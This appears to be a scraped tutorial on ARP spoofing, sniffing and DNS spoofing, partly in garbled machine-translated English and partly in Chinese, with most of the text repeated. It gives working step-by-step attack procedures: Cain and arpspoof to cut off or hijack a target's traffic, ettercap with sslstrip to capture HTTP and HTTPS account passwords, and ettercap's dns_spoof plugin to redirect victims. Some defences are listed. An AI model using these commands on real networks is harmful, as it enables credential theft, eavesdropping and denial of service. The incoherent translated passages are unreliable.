1, shared network
In a shared network, because the HUB belong to one device, for the arrival of data packets itself, HUB will broadcast packets (in addition to the interface receives packet), therefore all connected to the same PC can receive HUB message. PC opened the premise promiscuous mode
Note:
Typically, network cards are working in non-promiscuous mode, which means that even if the data packet is received, the card will determine whether the destination MAC and own the same, not the same, then the packet is not to representatives of their own, it drops only those receiving the destination MAC and their own packets. Promiscuous mode must be enabled when sniffing, in this mode, the card is judged not packets, end of the pot!
2, switched network
Exchange switches in the network will be transmitted according to MAC- port mapping table, which means that in addition to the gateway, PC machines under other switches can not receive the same (in the case of no-show attacks) packets.
Two, ARP spoofing
1、ARP
ARP (Address Resolution Protocol) is a protocol to determine its physical address only when the IP address of the host to know which is mainly used to translate an IP address for the MAC address of the Ethernet, but it can also ATM and IP networks in the FDDI use.
2, ARP communication process
Since the network traffic is not a local area network based on the IP address, but the transmission, a computer is used to identify machine according mac according to MAC address. Each host ARP cache there will be a table, which records the Mac address of all hosts within a local area network, when it needs to communicate with another host will first query the local ARP table, by the other party Mac address encapsulated packet, if the local ARP Mac address table does not correspond, it will send out broadcasts to LAN "my ip address is ... my Mac is ... is ... will the ip address of the Mac", when the corresponding check ip host receives the broadcast and then transmitted through a single point the way Mac tells its own address, and then both the ARP table, the more of each other's Mac address.
3, ARP spoofing
1. Individually deceive
A, B, C three, A and C communicate properly, B want to know the A to C made of the content, it is forged ARP response packet, change the ARP table A, it transmits A to the information C will be transmitted first to the B, B packets may be discarded, so that a sends C not receive data, but the normal to the a or C transmission data, which is individual to deceive
2. bidirectional attack
The same is A, B, C three, B at the same time to the A, C sends a response packet B to tell A that ip is C, ip, Mac address or B tell C its ip own, Mac address is A, , so that the communication a, C on B will go through, this is called bidirectional attack
3. difference
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>单向欺骗:是指欺骗网关
双向欺骗:是欺骗网关跟被攻击的两个机器</code></span></span>- 1
- 2
4. The host detects spoofing
- ARPkiller can use the "Sniffer killer" scan the entire LAN IP segment, and then look at the computer in "promiscuous" mode, you can find each other anymore. (Green hat icon is the normal mode, the red hat is promiscuous mode users)
- Use the tracert command, run under the DOS command window on any of the affected host the following command: tracert external network ip.
Principle:
poisoning the host between the affected hosts and gateways, played the role of "middleman". All this should arrive gateway packet due to an error of the MAC address, it is sent to the host poisoning. At this point, the host pre-empt the poisoning, played a role of the default gateway.
Popular talk tracert ping command is to look into this when outside the network over which ip, if the host is ARP spoofing, use this command will be exposed to attackers ip, because we attacker to access external network computer became a middleman so that the next hop it's ip
5. Defense
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>双绑定, 本地跟路由都做了绑定(注<span style="color:#009900 !important">:mac</span>地址绑定)
采用<span style="color:#009900 !important">ARP</span>防火墙</code></span></span>6.ARP virus attack symptoms
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>打开网页速度非常慢,甚至打不开
提示IP地址冲突
甚至导致校园网瘫痪断网
一般会绑定木马病毒,窃取用户账号密码</code></span></span>7.ARP attack instance
Use cain win follows:
- Select sniffer
- Click on the top left corner to start / stop sniffing icon
- Click on the blank space, select the right scanning mac; will appear next chart
select the first subnet all the host; ok - Select ARP below the
top left, click the plus sign
to the left of the selected target ip; choose the right gateway; and then began to cheat
if the other party began to visit a website, can be seen by passWord below the plaintext password
cain there are other functions on the left; specific use, see behind the blog cain specific use
Under Linux account password to achieve off network attacks, hijacking traffic, grab the https:
1.nmap扫描存活主机
nmap -sP 扫描ip(可以是网段;如下图) 
-sP:选项告诉Nmap仅仅进行ping扫描。
2.断网攻击
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>arpspoof <span style="color:#50a14f">-i</span> 网卡 <span style="color:#50a14f">-t</span> 目标IP 网关
<span style="color:#880000 !important"><em>//默认是不转发的,也就是说执行这条命令,目标机就无法联网了</em></span></code></span></span>3.流量劫持
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>echo <span style="color:#006666 !important">1</span> ><span style="color:#008800 !important">/proc/sys</span><span style="color:#008800 !important">/net/ipv</span>4/ip_forward
如:arpspoof -i eth<span style="color:#006666 !important">0</span> -t <span style="color:#006666 !important">192.168</span>.<span style="color:#006666 !important">100.15</span> <span style="color:#006666 !important">192.168</span>.<span style="color:#006666 !important">1.1</span>
将<span style="color:#006666 !important">1</span>写入这个文件就可以流量劫持了,同时目标机就能联网了,默认为<span style="color:#006666 !important">0</span>,要是还要执行断网操作,还可以将其改为<span style="color:#006666 !important">0</span>
即:echo <span style="color:#006666 !important">1</span> ><span style="color:#008800 !important">/proc/sys</span><span style="color:#008800 !important">/net/ipv</span>4/ip_forward</code></span></span>4.抓取http、https的账号密码
http:
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>echo <span style="color:#006666 !important">1</span> <span style="color:#4f4f4f !important">></span>/proc/sys/net/ipv4/ip_forward
arpspoof <span style="color:#50a14f">-i</span> eth0 <span style="color:#50a14f">-t</span> 目标ip
网关 ettercap <span style="color:#50a14f">-Tq</span> <span style="color:#50a14f">-i</span> eth0
<span style="color:#880000 !important"><em>//-T文本模式启动 -q安静模式</em></span></code></span></span>https:
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>先编辑下/etc/ettercap/etter.conf
找到:
<span style="color:#880000 !important"><em># if you use iptables:</em></span>
<span style="color:#880000 !important"><em>#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</em></span>
<span style="color:#880000 !important"><em>#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</em></span>
将后面两行的<span style="color:#880000 !important"><em>#去掉</em></span>
然后运行sslstrip -a -f -k 实现<span style="color:#000088 !important">https</span>转换成<span style="color:#000088 !important">http</span>以获取帐号密码
echo <span style="color:#006666 !important">1</span> > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 目标ip
ettercap -Tq -i eth0
<span style="color:#880000 !important"><em> //-T文本模式启动 -q安静模式</em></span></code></span></span>8. ARP欺骗与嗅探的区别
- 嗅探一般存在于共享网络中,在共享网络中一般使用HUB作为接入层,经过HUB的数据报文不管长得什么样,因为HUB工作在第一层,看不懂二层以上的报文是啥样子的,所以一律以广播处理,在同一网段的计算机只要将网卡设置成混杂模式即可。
- 嗅探在交换网络中不适用,因为交换机是通过MAC-端口对应表来转发数据报文的,所以在交换网络中如果只将网卡设置成混杂模式,而不进行ARP欺骗,其结果只能接受到网络中的广播包。
- 共享网络中适用ARP欺骗,那是多此一举,适用ARP欺骗的方式会对影响网络流量,对网络造成很大的影响,另外适用ARP欺骗会产生大量的ARP报文,很容易被发现。而嗅探对整个网络几乎没有影响,因为嗅探只是做监听,而不会产生多余的数据报文。
三、DNS欺骗
1、DNS
DNS即Domain Name System 的缩写,域名系统以分布式数据库的形式将域名和IP地址相互映射。DNS协议即域名解析协议,简单的说:DNS是用来将域名解析成对应ip地址的协议。
2、工作原理
- 访问 www.baidu.com ,首先要向本地DNS服务器发出DNS请求,查询 www.baidu.com 的IP地址,如果本地DNS服务器没有在自己的DNS缓存表中发现该网址的记录,就会向根服务器发起查询,根服务器收到请求后,将com域服务器的地址返回给本地DNS服务器,本地DNS服务器则继续向com域发出查询请求,域服务器将 baidu.com 授权域名服务器的地址返回给本地DNS服务器,本地DNS服务器继续向 baidu.com 发起查询,得到 www.baidu.com 的IP地址。
- 本地DNS服务器得到 www.baidu.com 对应的IP地址后以dns应答包的方式传递给用户,并且在本地建立DNS缓存表。
- Windows下查看和刷清空DNS缓存表的命令
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code> <span style="color:#000088 !important">ipconfig</span> /displaydns <span style="color:#000088 !important">ipconfig</span> /flushdns</code></span></span>3、DNS欺骗
首先欺骗者向目标机器发送构造好的ARP应答数据包,ARP欺骗成功后,嗅探到对方发出的DNS请求数据包,分析数据包取得ID和端口号后,向目标发送自己构造好的一个DNS返回包,对方收到DNS应答包后,发现ID和端口号全部正确,即把返回数据包中的域名和对应的IP地址保存进DNS缓存表中,而后来的当真实的DNS应答包返回时则被丢弃。
4、DNS欺骗实例
使用工具是Linux下的ettercap:
1、配置etterca的配置文件
上面两个192.168.1.181是攻击者的ip
2、开启Apache,并在根目录下创建一个html文件给被害者看
3、打开ettercap图形化界面
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>ettercap <span style="color:#50a14f">-G</span></code></span></span>- 1
1. 点击sniff下的unified sniffing 
2. 选择网卡 
3. 选择host下的扫描主机 
4. 查看扫描结果 
5. 将目标ip发送到target1;网关发送到target2 
6. 点击mitm下的ARP欺骗 
7. 选择第一个 
8. 点击plugins下的mangge the plugins 
9. 双击dns_spoof然后开始欺骗 
OK
4、防护
1.因为DNS欺骗前提也需要ARP欺骗成功。所以首先做好对ARP欺骗攻击的防范
2.不要依赖于DNS,尽管这样会很不方便,可以使用hosts文件来实现相同的功能;
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>Hosts文件位置:
windows xp/2003/vista/2008/7系统的HOSTS文件位置 c:<span style="color:#009900 !important">\windows</span><span style="color:#009900 !important">\system</span>32<span style="color:#009900 !important">\drivers</span><span style="color:#009900 !important">\etc</span> 用记事本打开即可进行修改。</code></span></span>3.使用安全检测软件定期检查系统是否遭受攻击
4.使用DNSSEC:DNS安全扩展,是由IETF提供的一系列DNS安全认证的机制(可参考RFC2535)。它提供了一种来源鉴定和数据完整性的扩展,但不去保障可用性、加密性和证实域名不存在。开发 DNSSEC 技术的目的之一是通过对数据进行数字“签名”来抵御此类攻击
1、共享网络
在共享网络中,由于HUB属于一层设备,对于到达本身的数据报文,HUB会对报文进行广播(除了收到报文的那个接口),因此接在同HUB的所有PC都能收到该报文。前提PC开启了混杂模式
注:
通常情况下,网卡都是工作在非混杂模式,也就是说即使收到数据报文,网卡会判断目的MAC是否和自己的一样,不一样的话代表数据包不是给自己的,因此会丢弃,只接收那些目的MAC和自己一样的数据报文。在嗅探时必须开启混杂模式,在该模式下,网卡不对数据报文进行判断,一锅端!
2、交换网络
交换网络中交换机会根据MAC-端口对应表进行传输,也就是说除了网关,其他同交换机下的PC机无法收到数据报文(没出现攻击的情况下)。
二、ARP欺骗
1、ARP
ARP(地址解析协议)是在仅知道主机的IP地址时确定其物理地址的一种协议,其主要用作将IP地址翻译为以太网的MAC地址,但其也能在ATM和FDDI IP网络中使用。
2、ARP通讯过程
由于局域网的网络流通不是根据IP地址进行,而是按照MAC地址进行传输、计算机是根据mac来识别一台机器。每台主机都会存在一个ARP高速缓存表,里面记录了局域网内所有主机的Mac地址,当它需要与另一个主机通信时会先查询本地ARP表,通过对方Mac地址来封装数据包,如果本地ARP表中没有对应的Mac地址,它会向局域网发出广播“我的ip是…我的Mac地址是…请问ip为…的Mac地址”,当对应主机收到广播核对ip然后通过单点传输的方式告诉它自己的Mac地址,然后双方ARP表中就多了彼此的Mac地址。
3、ARP欺骗
1、单项欺骗
A、B、C三个人,A与C正常通信,B想知道A给C发的内容,就伪造ARP响应包,更改A的ARP表,所以A发送给C的信息会先传送到B,B可以丢弃数据包,这样C就收不到A发的数据了,但是C还是可以正常给A发送数据的,这就是单项欺骗
2.双向欺骗
同样是A、B、C三个人,B同时给A、C发送响应包B告诉A它的ip是C的ip,Mac地址还是B的,告诉C它的ip是自己的,Mac地址是A的,这样A、C的通信就都会经过B,这就叫双向欺骗
3.区别
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>单向欺骗:是指欺骗网关
双向欺骗:是欺骗网关跟被攻击的两个机器</code></span></span>- 1
- 2
4.检测被欺骗的主机
- 可以利用ARPkiller的”Sniffer杀手”扫描整个局域网IP段,然后查找处在”混杂”模式下的计算机,就可以发现对方了.(绿帽子图标是正常模式,红帽子是混杂模式用户)
- 使用tracert命令在任意一台受影响的主机上,在DOS命令窗口下运行如下命令:tracert 外网ip。
原理:
中毒主机在受影响主机和网关之间,扮演了“中间人”的角色。所有本应该到达网关的数据包,由于错误的MAC地址,均被发到了中毒主机。此时,中毒主机越俎代庖,起了缺省网关的作用。
通俗讲tracert命令是看ping这个外网时进过了哪些ip,如果主机被ARP欺骗,使用这个命令就会暴露攻击者ip,因为我们访问外网时攻击者电脑成了中间人所以下一跳就是它的ip
5.防御
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>双绑定, 本地跟路由都做了绑定(注<span style="color:#009900 !important">:mac</span>地址绑定)
采用<span style="color:#009900 !important">ARP</span>防火墙</code></span></span>6.ARP病毒攻击症状
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>打开网页速度非常慢,甚至打不开
提示IP地址冲突
甚至导致校园网瘫痪断网
一般会绑定木马病毒,窃取用户账号密码</code></span></span>7.ARP攻击实例
win下使用cain:
- 选择嗅探器
- 点击左上角开始/停止嗅探的图标
- 点击空白处,右键选择扫描mac;会出现下图
选择第一个子网中全部主机;ok - 选择下方的ARP
点击左上角的加号
左边选择攻击目标的ip;右边选网关;然后开始欺骗
如果对方开始登陆某网站,可以通过下方的passWord可以看到明文密码
cain还有其他的功能在左边;具体使用,见后面的博客cain的具体使用
Linux下实现断网攻击、流量劫持、抓取https的账号密码:
1.nmap扫描存活主机
nmap -sP 扫描ip(可以是网段;如下图)
-sP:选项告诉Nmap仅仅进行ping扫描。
2.断网攻击
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>arpspoof <span style="color:#50a14f">-i</span> 网卡 <span style="color:#50a14f">-t</span> 目标IP 网关
<span style="color:#880000 !important"><em>//默认是不转发的,也就是说执行这条命令,目标机就无法联网了</em></span></code></span></span>3.流量劫持
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>echo <span style="color:#006666 !important">1</span> ><span style="color:#008800 !important">/proc/sys</span><span style="color:#008800 !important">/net/ipv</span>4/ip_forward
如:arpspoof -i eth<span style="color:#006666 !important">0</span> -t <span style="color:#006666 !important">192.168</span>.<span style="color:#006666 !important">100.15</span> <span style="color:#006666 !important">192.168</span>.<span style="color:#006666 !important">1.1</span>
将<span style="color:#006666 !important">1</span>写入这个文件就可以流量劫持了,同时目标机就能联网了,默认为<span style="color:#006666 !important">0</span>,要是还要执行断网操作,还可以将其改为<span style="color:#006666 !important">0</span>
即:echo <span style="color:#006666 !important">1</span> ><span style="color:#008800 !important">/proc/sys</span><span style="color:#008800 !important">/net/ipv</span>4/ip_forward</code></span></span>4.抓取http、https的账号密码
http:
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>echo <span style="color:#006666 !important">1</span> <span style="color:#4f4f4f !important">></span>/proc/sys/net/ipv4/ip_forward
arpspoof <span style="color:#50a14f">-i</span> eth0 <span style="color:#50a14f">-t</span> 目标ip
网关 ettercap <span style="color:#50a14f">-Tq</span> <span style="color:#50a14f">-i</span> eth0
<span style="color:#880000 !important"><em>//-T文本模式启动 -q安静模式</em></span></code></span></span>https:
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>先编辑下/etc/ettercap/etter.conf
找到:
<span style="color:#880000 !important"><em># if you use iptables:</em></span>
<span style="color:#880000 !important"><em>#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</em></span>
<span style="color:#880000 !important"><em>#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</em></span>
将后面两行的<span style="color:#880000 !important"><em>#去掉</em></span>
然后运行sslstrip -a -f -k 实现<span style="color:#000088 !important">https</span>转换成<span style="color:#000088 !important">http</span>以获取帐号密码
echo <span style="color:#006666 !important">1</span> > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 目标ip
ettercap -Tq -i eth0
<span style="color:#880000 !important"><em> //-T文本模式启动 -q安静模式</em></span></code></span></span>8. ARP欺骗与嗅探的区别
- 嗅探一般存在于共享网络中,在共享网络中一般使用HUB作为接入层,经过HUB的数据报文不管长得什么样,因为HUB工作在第一层,看不懂二层以上的报文是啥样子的,所以一律以广播处理,在同一网段的计算机只要将网卡设置成混杂模式即可。
- 嗅探在交换网络中不适用,因为交换机是通过MAC-端口对应表来转发数据报文的,所以在交换网络中如果只将网卡设置成混杂模式,而不进行ARP欺骗,其结果只能接受到网络中的广播包。
- 共享网络中适用ARP欺骗,那是多此一举,适用ARP欺骗的方式会对影响网络流量,对网络造成很大的影响,另外适用ARP欺骗会产生大量的ARP报文,很容易被发现。而嗅探对整个网络几乎没有影响,因为嗅探只是做监听,而不会产生多余的数据报文。
三、DNS欺骗
1、DNS
DNS即Domain Name System 的缩写,域名系统以分布式数据库的形式将域名和IP地址相互映射。DNS协议即域名解析协议,简单的说:DNS是用来将域名解析成对应ip地址的协议。
2、工作原理
- 访问 www.baidu.com ,首先要向本地DNS服务器发出DNS请求,查询 www.baidu.com 的IP地址,如果本地DNS服务器没有在自己的DNS缓存表中发现该网址的记录,就会向根服务器发起查询,根服务器收到请求后,将com域服务器的地址返回给本地DNS服务器,本地DNS服务器则继续向com域发出查询请求,域服务器将 baidu.com 授权域名服务器的地址返回给本地DNS服务器,本地DNS服务器继续向 baidu.com 发起查询,得到 www.baidu.com 的IP地址。
- 本地DNS服务器得到 www.baidu.com 对应的IP地址后以dns应答包的方式传递给用户,并且在本地建立DNS缓存表。
- Windows下查看和刷清空DNS缓存表的命令
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code> <span style="color:#000088 !important">ipconfig</span> /displaydns <span style="color:#000088 !important">ipconfig</span> /flushdns</code></span></span>3、DNS欺骗
首先欺骗者向目标机器发送构造好的ARP应答数据包,ARP欺骗成功后,嗅探到对方发出的DNS请求数据包,分析数据包取得ID和端口号后,向目标发送自己构造好的一个DNS返回包,对方收到DNS应答包后,发现ID和端口号全部正确,即把返回数据包中的域名和对应的IP地址保存进DNS缓存表中,而后来的当真实的DNS应答包返回时则被丢弃。
4、DNS欺骗实例
使用工具是Linux下的ettercap:
1、配置etterca的配置文件
上面两个192.168.1.181是攻击者的ip
2、开启Apache,并在根目录下创建一个html文件给被害者看
3、打开ettercap图形化界面
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>ettercap <span style="color:#50a14f">-G</span></code></span></span>- 1
1. 点击sniff下的unified sniffing
2. 选择网卡
3. 选择host下的扫描主机
4. 查看扫描结果
5. 将目标ip发送到target1;网关发送到target2
6. 点击mitm下的ARP欺骗
7. 选择第一个
8. 点击plugins下的mangge the plugins
9. 双击dns_spoof然后开始欺骗
OK
4、防护
1.因为DNS欺骗前提也需要ARP欺骗成功。所以首先做好对ARP欺骗攻击的防范
2.不要依赖于DNS,尽管这样会很不方便,可以使用hosts文件来实现相同的功能;
<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>Hosts文件位置:
windows xp/2003/vista/2008/7系统的HOSTS文件位置 c:<span style="color:#009900 !important">\windows</span><span style="color:#009900 !important">\system</span>32<span style="color:#009900 !important">\drivers</span><span style="color:#009900 !important">\etc</span> 用记事本打开即可进行修改。</code></span></span>3. Use security testing software regularly check whether the system is under attack
4. Using DNSSEC: DNS Security Extensions, is a series of DNS security authentication mechanism (refer to RFC2535) provided by the IETF. It provides integrity and extended a source of identification data, but do not guarantee availability, encryption and substantiate the domain name does not exist. One of the objectives is through the development of DNSSEC technology data digital "signature" to defend against such attacks